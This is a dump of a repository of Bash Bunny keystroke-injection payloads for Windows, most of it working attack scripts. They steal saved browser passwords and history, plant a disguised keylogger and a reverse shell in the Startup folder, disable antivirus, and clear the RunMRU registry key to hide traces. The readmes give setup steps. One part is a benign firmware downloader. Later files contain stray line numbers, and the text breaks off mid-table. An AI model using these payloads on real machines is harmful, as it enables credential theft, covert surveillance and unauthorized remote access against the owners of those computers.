├── BHG
│   ├── Clean.ps1
│   ├── GetDrive.ps1
│   ├── history.exe
│   ├── payload.txt
│   └── readme.md
├── BPG
│   ├── Clean.ps1
│   ├── GetDrive.ps1
│   ├── pass.exe
│   ├── payload.txt
│   └── readme.md
├── Binary-s
│   ├── USB PWNR
│   │   ├── history.exe
│   │   ├── pass.exe
│   │   └── readme.md
│   └── readme.md
├── BunnyFlasher
│   ├── BunnyFlasher.ps1
│   ├── SourceCode
│   │   ├── bunnyflasher.txt
│   │   └── icon.ico
│   └── readme.md
├── KeyHopper
│   ├── GetDrive.ps1
│   ├── payload.txt
│   └── readme.md
├── README.md
├── Reverse-Shell
│   ├── Clean.ps1
│   ├── GetDrive.ps1
│   ├── copy-reverse.txt
│   ├── payload.txt
│   └── readme.md
├── USB-PWNR -SLOW
│   ├── Payloads - Readme's
│   │   ├── payload-files.txt
│   │   ├── readme-BHG.md
│   │   ├── readme-BPG.md
│   │   ├── readme-InfoGrabber.md
│   │   └── readme-reverse-shell.md
│   └── readme.md
└── USB-PWNR
    ├── Clean.ps1
    ├── GetDrive.ps1
    ├── Payloads-Readme-s
    │   ├── payload-files.txt
    │   ├── readme-BHG.md
    │   ├── readme-BPG.md
    │   ├── readme-InfoGrabber.md
    │   └── readme-reverse-shell.md
    ├── disable-anti-virus.ps1
    ├── info.ps1
    ├── payload.txt
    ├── readme.md
    └── run.ps1

/BHG/Clean.ps1:
--------------------------------------------------------------------------------
-WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
--------------------------------------------------------------------------------
/BHG/GetDrive.ps1:
--------------------------------------------------------------------------------
(gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip
--------------------------------------------------------------------------------
/BHG/history.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/BHG/history.exe
--------------------------------------------------------------------------------
/BHG/payload.txt:
--------------------------------------------------------------------------------
#BHG (BrowserHistoryGrabber)
#Steals all browser history in seconds

#Setup
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

#Attack phase
LED ATTACK
#Copy driveletter by running GetDrive.ps1
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')"
Q DELAY 800
#Start program
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\history.exe')"
Q DELAY 1500
Q ENTER
Q DELAY 3000
Q CONTROL a
Q DELAY 500
Q CONTROL s
Q DELAY 500
Q STRING %computername% - History
Q F4
Q DELAY 100
Q CONTROL a
Q DELAY 100
Q CONTROL v
Q DELAY 100
Q STRING loot
Q DELAY 200
Q ENTER
Q DELAY 500
Q TAB
Q TAB
Q TAB
Q TAB
Q TAB
Q TAB
Q ENTER
Q DELAY 100
Q ALT F4

#Cleaning up
LED CLEANUP
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER

LED FINISH
ATTACKMODE OFF
--------------------------------------------------------------------------------
/BHG/readme.md:
--------------------------------------------------------------------------------
# BHG (BrowserHistoryGrabber)

* Author: C1PH3R
* Creds: C1PH3R, Nirsoft
* Target: Windows

## Description

Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera.
This payload is quick and takes about 15 seconds after insertion.

#No configuration needed


| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Attack Setup |
| Green | Attack Complete |

#No discussion yet!

"Don't look at the branch of the problem, look at the root! (C1PH3R)"

--------------------------------------------------------------------------------
/BPG/Clean.ps1:
--------------------------------------------------------------------------------
-WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
--------------------------------------------------------------------------------
/BPG/GetDrive.ps1:
--------------------------------------------------------------------------------
(gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip
--------------------------------------------------------------------------------
/BPG/pass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/BPG/pass.exe
--------------------------------------------------------------------------------
/BPG/payload.txt:
--------------------------------------------------------------------------------
#BPG (BrowserPasswordGrabber)
#Steals all browser passwords in seconds

#Setup
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

#Attack phase
LED ATTACK
#Copy driveletter by running GetDrive.ps1
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')"
Q DELAY 800
#Start program
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pass.exe')"
Q DELAY 1800
Q CONTROL a
Q DELAY 500
Q CONTROL s
Q DELAY 500
Q STRING %computername% - Pass
Q F4
Q DELAY 100
Q CONTROL a
Q DELAY 100
Q CONTROL v
Q DELAY 100
Q STRING loot
Q DELAY 200
Q ENTER
Q DELAY 500
Q TAB
Q TAB
Q TAB
Q TAB
Q TAB
Q TAB
Q ENTER
Q DELAY 100
Q ALT F4

#Cleaning up
LED CLEANUP
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER

LED FINISH
ATTACKMODE OFF

--------------------------------------------------------------------------------
/BPG/readme.md:
--------------------------------------------------------------------------------
# BPG (BrowserPasswordGrabber)

* Author: C1PH3R
* Creds: C1PH3R, Nirsoft
* Target: Windows

## Description

Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera.
This payload is quick and takes about 15 seconds after insertion.

#No configuration needed


| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Attack Setup |
| Green | Attack Complete |

#No discussion yet!

"Don't look at the branch of the problem, look at the root! (C1PH3R)"

--------------------------------------------------------------------------------
/Binary-s/USB PWNR/history.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/Binary-s/USB PWNR/history.exe
--------------------------------------------------------------------------------
/Binary-s/USB PWNR/pass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/Binary-s/USB PWNR/pass.exe
--------------------------------------------------------------------------------
/Binary-s/USB PWNR/readme.md:
--------------------------------------------------------------------------------

All of the binaries of USB PWNR!

--------------------------------------------------------------------------------
/Binary-s/readme.md:
--------------------------------------------------------------------------------
Contains the binaries of various projects/payloads.

--------------------------------------------------------------------------------
/BunnyFlasher/BunnyFlasher.ps1:
--------------------------------------------------------------------------------
# For the SourceCode
# I did not think that I would open-source this project, so it is not well commented or clean!


$start_time = Get-Date
Import-Module BitsTransfer
$driveletter = (gwmi -class win32_volume -filter "label='BashBunny'").Name

$image = {
'____ _____ _ _
| __ ) _ _ _ __ _ __ _ _| ___| | __ _ ___| |__ ___ _ __
| _ \| | | | _ \| _ \| | | | |_ | | / _ / __| _ \ / _ \ __|
| |_) | |_| | | | | | | | |_| | _| | |__| (_| \__ \ | | | __/ |
|____/ \__ _|_| |_|_| |_|\__ |_| |_____\__ _|___/_| |_|\___|_|
|___/'
}

$image
echo 'Bunny-Flasher'
echo '============='
echo '[1] Firmware options'
echo '[2] Exit'
$userinput = Read-Host -Prompt 'ENTER your choise'

If ($userinput -eq 1) {

    cls
    $image
    echo 'Choose your firmware'
    echo '===================='
    echo '[1] 1.5 (newest)'
    echo '[2] 1.4'
    echo '[3] 1.3'
    echo '[4] 1.2'
    echo '[5] 1.1'
    $userinput2 = Read-Host -Prompt 'ENTER your choise'

    If ($userinput2 -eq 1) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.5_298.tar.gz"
        $output = "$driveletter\ch_fw_1.5_298.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo 'Press ENTER to exit'
        echo ""
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    Elseif ($userinput2 -eq 2) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.4_284.tar.gz"
        # Save under the name of the file actually downloaded
        $output = "$driveletter\ch_fw_1.4_284.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    Elseif ($userinput2 -eq 3) {
        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.3_264.tar.gz"
        $output = "$driveletter\ch_fw_1.3_264.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit
    }

    Elseif ($userinput2 -eq 4) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.2_249.tar.gz"
        $output = "$driveletter\ch_fw_1.2_249.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    Elseif ($userinput2 -eq 5) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.1_228.tar.gz"
        $output = "$driveletter\ch_fw_1.1_228.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    else {

        cls
        $image
        echo 'That was not one of the options!'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

}

Elseif ($userinput -eq 2) {
    exit
}

else {
    cls
    $image
    echo 'That was not one of the options!'
    echo ""
    echo 'Press ENTER to exit'
    $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
    exit
}

cls
$image
echo 'An unknow error has occured, please send a screenshot with detailed info of what happend to error@c1ph3r.nl'
--------------------------------------------------------------------------------
/BunnyFlasher/SourceCode/bunnyflasher.txt:
--------------------------------------------------------------------------------
$start_time = Get-Date
Import-Module BitsTransfer
$driveletter = (gwmi -class win32_volume -filter "label='BashBunny'").Name

$image = {
'____ _____ _ _
| __ ) _ _ _ __ _ __ _ _| ___| | __ _ ___| |__ ___ _ __
| _ \| | | | _ \| _ \| | | | |_ | | / _ / __| _ \ / _ \ __|
| |_) | |_| | | | | | | | |_| | _| | |__| (_| \__ \ | | | __/ |
|____/ \__ _|_| |_|_| |_|\__ |_| |_____\__ _|___/_| |_|\___|_|
|___/'
}

$image
echo 'Bunny-Flasher'
echo '============='
echo '[1] Firmware options'
echo '[2] Exit'
$userinput = Read-Host -Prompt 'ENTER your choise'

If ($userinput -eq 1) {

    cls
    $image
    echo 'Choose your firmware'
    echo '===================='
    echo '[1] 1.5 (newest)'
    echo '[2] 1.4'
    echo '[3] 1.3'
    echo '[4] 1.2'
    echo '[5] 1.1'
    $userinput2 = Read-Host -Prompt 'ENTER your choise'

    If ($userinput2 -eq 1) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.5_298.tar.gz"
        $output = "$driveletter\ch_fw_1.5_298.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo 'Press ENTER to exit'
        echo ""
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    Elseif ($userinput2 -eq 2) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.4_284.tar.gz"
        # Save under the name of the file actually downloaded
        $output = "$driveletter\ch_fw_1.4_284.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    Elseif ($userinput2 -eq 3) {
        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.3_264.tar.gz"
        $output = "$driveletter\ch_fw_1.3_264.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit
    }

    Elseif ($userinput2 -eq 4) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.2_249.tar.gz"
        # Save under the name of the file actually downloaded
        $output = "$driveletter\ch_fw_1.2_249.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    Elseif ($userinput2 -eq 5) {

        cls
        $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.1_228.tar.gz"
        $output = "$driveletter\ch_fw_1.1_228.tar.gz"
        Start-BitsTransfer -Source $url -Destination $output
        Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
        cls
        $image
        echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

    else {

        cls
        $image
        echo 'That was not one of the options!'
        echo ""
        echo 'Press ENTER to exit'
        $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
        exit

    }

}

Elseif ($userinput -eq 2) {
    exit
}

else {
    cls
    $image
    echo 'That was not one of the options!'
    echo ""
    echo 'Press ENTER to exit'
    $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
    exit
}

cls
$image
echo 'An unknow error has occured, please send a screenshot with detailed info of what happend to error@c1ph3r.nl'

--------------------------------------------------------------------------------
/BunnyFlasher/SourceCode/icon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/BunnyFlasher/SourceCode/icon.ico
--------------------------------------------------------------------------------
/BunnyFlasher/readme.md:
--------------------------------------------------------------------------------
# Firmware flasher for the Bashbunny, able to flash firmware from 1.1 to 1.5.

* 1 Drag and drop the .exe file anywhere on your computer.
* 2 Put in your BashBunny.
* 3 Open the .exe, and follow the steps on screen.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
###### Disclaimer: This is not an official firmware flasher, use at your own risk!
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

# For the SourceCode
* I did not think that I would open-source this project, so it is not well commented or clean!
* I have deleted the .exe file due to false-positive messages from antivirus products and because admins thought my code was malicious; now my code is open-sourced so everyone sees what is going on. Do note that if you want you can compile a .exe for yourself at any time. (I am just not going to give a .exe to you because people would think it is malicious.)

--------------------------------------------------------------------------------
/KeyHopper/GetDrive.ps1:
--------------------------------------------------------------------------------
(gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip
--------------------------------------------------------------------------------
/KeyHopper/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash

#KeyHopper
#Spawns a keylogger and adds it to shell:startup

#Delay CONFIGURATION
#Edit the lines below to change the standard delays in the script
#SFD = Super Fast delay (waiting for CTRL v for example) FASTMODE(standard)=100 SLOWMODE=500
SFD="100"
#FD = Fast delay (waiting for CTRL v for example) FASTMODE(standard)=500 SLOWMODE=1000
FD="500"
#ND = Normal delay (waiting for programs to shut off) FASTMODE(standard)=1000 SLOWMODE=2000
ND="1000"
#LD = Long delay (waiting for programs to start or bash scripts to execute) FASTMODE(standard)=1500 SLOWMODE=3500
LD="1500"

#KeyloggerName CONFIGURATION
name=servicehost.txt

#Shutting off CONFIGURATION
#Edit the line below to shut the bunny off after finishing ("" = turn off / "#" = Do not turn off)
AM="#"

#Editing text below this line may prevent the script from working! (Except for changing servicehost.txt)

#Setup
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Wait for the computer to recognise the drive etc
Q delay $LD
Q delay $LD
Q delay $LD
#Get drive letter and copy it:
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')"
Q DELAY $ND


#Copy keylogger and add it to shell:startup
LED STAGE4
Q GUI r
Q DELAY $SFD
Q STRING powershell
Q ENTER
Q DELAY $FD
Q STRING copy
Q SPACE
Q DELAY $ND
Q CONTROL v
Q DELAY $FD
Q BACKSPACE
Q DELAY $FD
Q STRING "payloads\\"$name" 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
Q ENTER
Q DELAY $FD
Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$name"\'"
Q DELAY $SFD
Q ENTER
Q ALT F4
Q DELAY $LD
Q DELAY $LD

#Cleaning up phase
LED CLEANUP
RUN WIN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
Q ENTER

LED FINISH
$AM ATTACKMODE OFF

--------------------------------------------------------------------------------
/KeyHopper/readme.md:
--------------------------------------------------------------------------------
# KeyHopper
* Written by: C1PH3R
* Creds: C1PH3R
* Target: Windows

# Description:

# Does the following:

- [x] Starts a keylogger and copies it to shell:startup


# Configuration:
* Download/make a keylogger using whatever program you want (sAINT for example)
* Place a file whatever.whatever in Bashbunny/payloads
* Replace the text: servicehost.txt in payload.txt file to whatever.whatever (Whatever = the filetype/name you have selected for your keylogger)
* Optional: edit the "Delay CONFIGURATION" in payload file to your preferences to make the payload work with slower/older or faster/newer computers
* Optional: edit the "Shutting off CONFIGURATION" in the payload file to shut the bunny off after the payload is done



| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Attack Setup |
| Stage (blinking) | Busy (do not remove stick) |
| Green | Attack Complete |
| Red | Fail |

* No discussion yet!

# "Don't look at the branch of the problem, look at the root! (C1PH3R)"

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# BashBunny
My BashBunny scripts
"Don't look at the branch of the problem, look at the root! (C1PH3R)"

--------------------------------------------------------------------------------
/Reverse-Shell/Clean.ps1:
--------------------------------------------------------------------------------
-WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
--------------------------------------------------------------------------------
/Reverse-Shell/GetDrive.ps1:
--------------------------------------------------------------------------------
(gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip
--------------------------------------------------------------------------------
/Reverse-Shell/copy-reverse.txt:
--------------------------------------------------------------------------------
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 500
STRING copy
SPACE
CONTROL v
BACKSPACE
STRING payloads\servicehost.txt 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
ENTER
DELAY 200
STRING start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicehost.txt'
ENTER
DELAY 5000
STRING exit
ENTER
DELAY 200
--------------------------------------------------------------------------------
/Reverse-Shell/payload.txt:
--------------------------------------------------------------------------------
#Copy reverse shell file to shell:startup and start it


#Setup
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

Q DELAY 5000

#Attack phase
LED ATTACK
#Disable AntiVirus (Windows Defender)
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"
Q DELAY 1000
Q LEFT
Q ENTER
#Copy driveletter by running GetDrive.ps1
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')"
Q 1000

#Move servicehost.txt to shell:startup

QUACK switch1/copy-reverse.txt

#Cleaning up
LED CLEANUP
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER

LED FINISH
#ATTACKMODE OFF

--------------------------------------------------------------------------------
/Reverse-Shell/readme.md:
--------------------------------------------------------------------------------
# Reverse-Shell

* Author: C1PH3R
* Creds: C1PH3R
* Target: Windows

## Description

Copies the file servicehost.txt to the startup directory (shell:startup) and executes it.

## Configuration
#Replace the text: servicehost.txt in payload.txt as well as in the copy-reverse.txt file with servicehost.whatever
#(Whatever) = the filetype you have selected as your reverse shell


| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Attack Setup |
| Green | Attack Complete |

#No discussion yet!

#"Don't look at the branch of the problem, look at the root! (C1PH3R)"

--------------------------------------------------------------------------------
/USB-PWNR -SLOW/Payloads - Readme's/payload-files.txt:
--------------------------------------------------------------------------------
You can find the payload files at:

BPG: https://github.com/CIPH3R0/BashBunny/tree/master/BPG

BHG: https://github.com/CIPH3R0/BashBunny/tree/master/BHG

InfoGrabber: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber

Reverse-shell: https://github.com/CIPH3R0/BashBunny/tree/master/Reverse-Shell
--------------------------------------------------------------------------------
/USB-PWNR -SLOW/Payloads - Readme's/readme-BHG.md:
--------------------------------------------------------------------------------
# BHG (BrowserHistoryGrabber)

* Author: speedy22013
* Creds: speedy22013, Nirsoft
* Target: Windows

## Description

Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera.
This payload is quick and takes about 15 seconds after insertion.

#No configuration needed


| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Attack Setup |
| Green | Attack Complete |

#No discussion yet!


--------------------------------------------------------------------------------
/USB-PWNR -SLOW/Payloads - Readme's/readme-BPG.md:
--------------------------------------------------------------------------------
# BPG (BrowserPasswordGrabber)

* Author: speedy22013
* Creds: speedy22013, Nirsoft
* Target: Windows

## Description

Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera.
This payload is quick and takes about 15 seconds after insertion.

#No configuration needed


| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Attack Setup |
| Green | Attack Complete |

#No discussion yet!


--------------------------------------------------------------------------------
/USB-PWNR -SLOW/Payloads - Readme's/readme-InfoGrabber.md:
--------------------------------------------------------------------------------
# Info Grabber for the BashBunny

Original Author Simen Kjeserud

V2.0 Author: DannyK999

Version: Version 2.0

Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration


((`\
___ \\ '--._
.'` `' o )
/ \ '. __.'
_| /_ \ \_\_
{_\______\-'\__\_\
Check out Simen's website:
aknemis.com

## Description

Gather a lot of information about the computer and place it in a text file in loot/info/.

Updates include code/output cleanup, faster runtime, and more veiled execution.

Here you can see what it will look like:


System Information for: DESKTOP-9BVPPVN

Manufacturer: Dell Inc.

Model: XPS 13 9360

Serial Number: *******

CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz

HDD Capacity: 464.38GB

HDD Space: 82.32 % Free (382.28GB)

RAM: 15.89GB

Operating System: Microsoft Windows 10 Home, Service Pack: 0

User logged In: DESKTOP-9BVPPVN\aknem

Last Reboot: 02/21/2017 19:49:30

Computers MAC adress: ****************

Computers IP adress: ***********

Public IP adress: ****************

RDP: RDP is NOT enabled


| ProfileName | SSID | Password |
| ---------------- | ------------------------------------- | ------------------------------------- |
| privatsna11234 | privatsna11234 | ******** |
| privatsna11234 | privatsna11234 | ******** |



## Configuration

Made for Windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.

## STATUS

| LED | Status |
| ---------------- | ------------------------------------- |
| Purple (blinking)| Attack in progress |
| Green | Attack Finished |



## Discussion (Not yet created)
[Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread")

--------------------------------------------------------------------------------
/USB-PWNR -SLOW/Payloads - Readme's/readme-reverse-shell.md:
--------------------------------------------------------------------------------
# Reverse-Shell

* Author: speedy22013
* Creds: speedy22013
* Target: Windows

## Description

Copies the file servicehost.txt to the startup directory (shell:startup) and executes it.
10 | 11 | ##Configruation 12 | #Place a file servicehost.whatever in Bashbunny/payloads 13 | #Replace the text: servicehost.txt in payload.txt as well as in the copy-reverse.txt file with servicehost.whatever 14 | #(Whatever) = the filetype you have selected as your reverse shell 15 | 16 | 17 | | LED | Status | 18 | | ------------------ | -------------------------------------------- | 19 | | Amber | Attack Setup | 20 | | Green | Attack Complete | 21 | 22 | #No discussion jet! 23 | 24 | -------------------------------------------------------------------------------- /USB-PWNR -SLOW/readme.md: -------------------------------------------------------------------------------- 1 | # USB PWNR SLOW (THIS PROJECT HAS BEEN SHUT DOWN!) 2 | 3 | The slower version that was originally in this location has been terminated due to the reasons below: 4 | 5 | This (SLOW mode) is now a optional feature that you can configure in the configuration area on the V2 of the USB PWNR payload 6 | 7 | Link to V2: 8 | 9 | # https://github.com/CIPH3R0/BashBunny/tree/master/USB-PWNR 10 | -------------------------------------------------------------------------------- /USB-PWNR/Clean.ps1: -------------------------------------------------------------------------------- 1 | -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" -------------------------------------------------------------------------------- /USB-PWNR/GetDrive.ps1: -------------------------------------------------------------------------------- 1 | (gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/payload-files.txt: -------------------------------------------------------------------------------- 1 | You can find the origional payload files at: 2 | 3 | BPG: 
https://github.com/CIPH3R0/BashBunny/tree/master/BPG 4 | 5 | BHG: https://github.com/CIPH3R0/BashBunny/tree/master/BHG 6 | 7 | InfoGrabber: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber 8 | 9 | Reverse-shell: https://github.com/CIPH3R0/BashBunny/tree/master/Reverse-Shell 10 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-BHG.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserHistoryGrabber) 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 21 | 22 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-BPG.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserPasswordGrabber) 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 